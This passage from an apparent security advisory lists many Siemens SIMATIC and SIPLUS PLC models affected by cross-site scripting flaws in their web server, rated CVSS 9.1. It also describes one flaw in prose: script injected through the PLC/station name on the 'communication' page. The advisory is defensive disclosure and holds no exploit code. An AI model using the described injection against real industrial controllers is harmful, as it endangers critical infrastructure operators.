- SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FL03-0AB0): vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TK01-0AB0): vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TL03-0AB0): vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UK01-0AB0): vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UL03-0AB0): vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK00-0AB0): vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK01-0AB0): vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CM03-0AB0): vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL00-0AB0): vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL01-0AB0): vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL02-0AB0): vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AM03-0AB0): vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL00-0AB0): vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL01-0AB0): vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL02-0AB0): vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FM03-0AB0): vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1513pro F-2 PN (6ES7513-2GM03-0AB0): vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1513pro-2 PN (6ES7513-2PM03-0AB0): vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM00-0AB0): vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM01-0AB0): vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM02-0AB0): vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AN03-0AB0): vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM00-0AB0): vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM01-0AB0): vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM02-0AB0): vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FN03-0AB0): vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TM01-0AB0): vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1515T-2 PN (6ES7515-2TN03-0AB0): vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UM01-0AB0): vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1515TF-2 PN (6ES7515-2UN03-0AB0): vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN00-0AB0): vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)
- SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN01-0AB0): vers:intdot/<2.9.9 (CVE-2026-25786,
CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AN02-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1516-3 PN/DP (6ES7516-3AP03-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN00-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN01-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FN02-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1516F-3 PN/DP (6ES7516-3FP03-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1516pro F-2 PN (6ES7516-2GP03-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1516pro-2 PN (6ES7516-2PP03-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1516T-3 PN (6ES7516-3TP10-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1516T-3 PN/DP (6ES7516-3TN00-0AB0) vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1516TF-3 PN (6ES7516-3UP10-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1516TF-3 PN/DP (6ES7516-3UN00-0AB0) vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1517-3 PN (6ES7517-3AQ10-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1517-3 PN/DP (6ES7517-3AP00-0AB0) vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1517F-3 PN (6ES7517-3FQ10-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP00-0AB0) vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1517F-3 PN/DP (6ES7517-3FP01-0AB0) vers:intdot/<3.1.6 
(CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1517T-3 PN (6ES7517-3TQ10-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1517T-3 PN/DP (6ES7517-3TP00-0AB0) vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1517TF-3 PN (6ES7517-3UQ10-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1517TF-3 PN/DP (6ES7517-3UP00-0AB0) vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1518-3 PN (6ES7518-3AT10-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1518-4 PN/DP (6ES7518-4AP00-0AB0) vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1518F-3 PN (6ES7518-3FT10-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1518F-4 PN/DP (6ES7518-4FP00-0AB0) vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1518T-3 PN (6ES7518-3TT10-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1518T-4 PN/DP (6ES7518-4TP00-0AB0) vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1518TF-3 PN (6ES7518-3UT10-0AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU 1518TF-4 PN/DP (6ES7518-4UP00-0AB0) vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU S7-1518-4 
PN/DP ODK (6ES7518-4AP00-3AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK (6ES7518-4FP00-3AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN (6ES7513-2GL00-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN (6ES7513-2PL00-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN (6ES7516-2GN00-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN (6ES7516-2PN00-0AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 Software Controller CPU 1507S F V2 vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 Software Controller CPU 1507S F V3 vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 Software Controller CPU 1507S F V4 vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 Software Controller CPU 1507S V2 vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 Software Controller CPU 1507S V3 vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 Software Controller CPU 1507S V4 vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 Software Controller CPU 1508S F V2 vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 Software Controller CPU 1508S F V3 vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 Software Controller CPU 1508S F V4 vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 Software Controller CPU 1508S T V3 vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 Software Controller CPU 1508S TF V3 vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 Software 
Controller CPU 1508S V2 vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 Software Controller CPU 1508S V3 vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 Software Controller CPU 1508S V4 vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 Software Controller Linux V2 vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-1500 Software Controller Linux V3 vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIMATIC S7-PLCSIM Advanced vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS ET 200SP CPU 1510SP F-1 PN (6AG1510-1SJ01-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS ET 200SP CPU 1510SP F-1 PN RAIL (6AG2510-1SJ01-1AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS ET 200SP CPU 1510SP-1 PN (6AG1510-1DJ01-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS ET 200SP CPU 1510SP-1 PN (6AG1510-1DJ01-7AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS ET 200SP CPU 1510SP-1 PN RAIL (6AG2510-1DJ01-1AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS ET 200SP CPU 1510SP-1 PN RAIL (6AG2510-1DJ01-4AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS ET 200SP CPU 1512SP F-1 PN (6AG1512-1SK00-2AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS ET 200SP CPU 1512SP F-1 PN (6AG1512-1SK01-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS ET 200SP CPU 1512SP F-1 PN (6AG1512-1SK01-7AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS ET 200SP CPU 1512SP F-1 PN RAIL (6AG2512-1SK01-1AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS ET 200SP CPU 1512SP F-1 PN RAIL (6AG2512-1SK01-4AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS ET 200SP CPU 1512SP-1 PN 
(6AG1512-1DK01-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS ET 200SP CPU 1512SP-1 PN (6AG1512-1DK01-7AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS ET 200SP CPU 1512SP-1 PN RAIL (6AG2512-1DK01-1AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS ET 200SP CPU 1512SP-1 PN RAIL (6AG2512-1DK01-4AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK00-2AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK01-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK01-7AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK02-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1511-1 PN (6AG1511-1AK02-7AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1511-1 PN T1 RAIL (6AG2511-1AK01-1AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1511-1 PN T1 RAIL (6AG2511-1AK02-1AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1511-1 PN TX RAIL (6AG2511-1AK01-4AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1511-1 PN TX RAIL (6AG2511-1AK02-4AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1511F-1 PN (6AG1511-1FK00-2AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1511F-1 PN (6AG1511-1FK01-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1511F-1 PN (6AG1511-1FK02-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL00-2AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, 
CVE-2026-25789) SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL01-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL01-7AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL02-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1513-1 PN (6AG1513-1AL02-7AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1513F-1 PN (6AG1513-1FL00-2AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1513F-1 PN (6AG1513-1FL01-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1513F-1 PN (6AG1513-1FL02-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1515F-2 PN (6AG1515-2FM01-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1515F-2 PN (6AG1515-2FM02-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1515F-2 PN RAIL (6AG2515-2FM02-4AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1515F-2 PN T2 RAIL (6AG2515-2FM01-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN00-2AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN00-7AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN01-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN01-7AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN02-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1516-3 PN/DP (6AG1516-3AN02-7AB0) vers:intdot/<2.9.9 
(CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1516-3 PN/DP RAIL (6AG2516-3AN02-4AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1516-3 PN/DP TX RAIL (6AG2516-3AN01-4AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1516F-3 PN/DP (6AG1516-3FN00-2AB0) vers:all/* (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1516F-3 PN/DP (6AG1516-3FN01-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1516F-3 PN/DP (6AG1516-3FN02-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1516F-3 PN/DP RAIL (6AG2516-3FN02-2AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1516F-3 PN/DP RAIL (6AG2516-3FN02-4AB0) vers:intdot/<2.9.9 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1518-4 PN/DP (6AG1518-4AP00-4AB0) vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789) SIPLUS S7-1500 CPU 1518F-4 PN/DP (6AG1518-4FP00-4AB0) vers:intdot/<3.1.6 (CVE-2026-25786, CVE-2026-25787, CVE-2026-25789)

CVSS v3: 9.1
Vendor: Siemens
Equipment: Siemens SIMATIC S7 PLC Web Server
Vulnerabilities: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Background
Critical Infrastructure Sectors: Chemical, Energy, Food and Agriculture, Water and Wastewater
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Germany

Vulnerabilities

CVE-2026-25786
Affected devices do not properly validate and sanitize the PLC/station name rendered on the "communication" parameters page of the web interface. This could allow an authenticated attacker who is authorized to download a TIA project into the product to inject malicious scripts into the page.
If a benign user with appropriate rights accesses the "communication" parameters page, the malicious code would be executed in the scope of their web session.

Affected Products
Siemens SIMATIC S7 PLC Web Server
Vendor: Siemens
Product Version: SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0), SIMATIC Drive Controller CPU 1507D TF (6ES7615-7DF10-0AB0), SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ00-0AB0), SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SJ01-0AB0), SIMATIC ET 200SP CPU 1510SP F-1 PN (6ES7510-1SK03-0AB0), SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ00-0AB0), SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DJ01-0AB0), SIMATIC ET 200SP CPU 1510SP-1 PN (6ES7510-1DK03-0AB0), SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK00-0AB0), SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SK01-0AB0), SIMATIC ET 200SP CPU 1512SP F-1 PN (6ES7512-1SM03-0AB0), SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK00-0AB0), SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DK01-0AB0), SIMATIC ET 200SP CPU 1512SP-1 PN (6ES7512-1DM03-0AB0), SIMATIC ET 200SP CPU 1514SP F-2 PN (6ES7514-2SN03-0AB0), SIMATIC ET 200SP CPU 1514SP-2 PN (6ES7514-2DN03-0AB0), SIMATIC ET 200SP CPU 1514SPT F-2 PN (6ES7514-2WN03-0AB0), SIMATIC ET 200SP CPU 1514SPT-2 PN (6ES7514-2VN03-0AB0), SIMATIC ET 200SP Open Controller CPU 1515SP PC (incl. SIPLUS variants), SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants) V2 CPUs, SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl.
SIPLUS variants) V3 CPUs, SIMATIC ET 200SP Open Controller CPU 1515SP PC3 V4 CPUs, SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK00-0AB0), SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK01-0AB0), SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AK02-0AB0), SIMATIC S7-1500 CPU 1511-1 PN (6ES7511-1AL03-0AB0), SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK00-0AB0), SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CK01-0AB0), SIMATIC S7-1500 CPU 1511C-1 PN (6ES7511-1CL03-0AB0), SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK00-0AB0), SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK01-0AB0), SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FK02-0AB0), SIMATIC S7-1500 CPU 1511F-1 PN (6ES7511-1FL03-0AB0), SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TK01-0AB0), SIMATIC S7-1500 CPU 1511T-1 PN (6ES7511-1TL03-0AB0), SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UK01-0AB0), SIMATIC S7-1500 CPU 1511TF-1 PN (6ES7511-1UL03-0AB0), SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK00-0AB0), SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CK01-0AB0), SIMATIC S7-1500 CPU 1512C-1 PN (6ES7512-1CM03-0AB0), SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL00-0AB0), SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL01-0AB0), SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AL02-0AB0), SIMATIC S7-1500 CPU 1513-1 PN (6ES7513-1AM03-0AB0), SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL00-0AB0), SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL01-0AB0), SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FL02-0AB0), SIMATIC S7-1500 CPU 1513F-1 PN (6ES7513-1FM03-0AB0), SIMATIC S7-1500 CPU 1513pro F-2 PN (6ES7513-2GM03-0AB0), SIMATIC S7-1500 CPU 1513pro-2 PN (6ES7513-2PM03-0AB0), SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM00-0AB0), SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM01-0AB0), SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AM02-0AB0), SIMATIC S7-1500 CPU 1515-2 PN (6ES7515-2AN03-0AB0), SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM00-0AB0), SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM01-0AB0), SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FM02-0AB0), SIMATIC S7-1500 CPU 1515F-2 PN (6ES7515-2FN03-0AB0), SIMATIC 
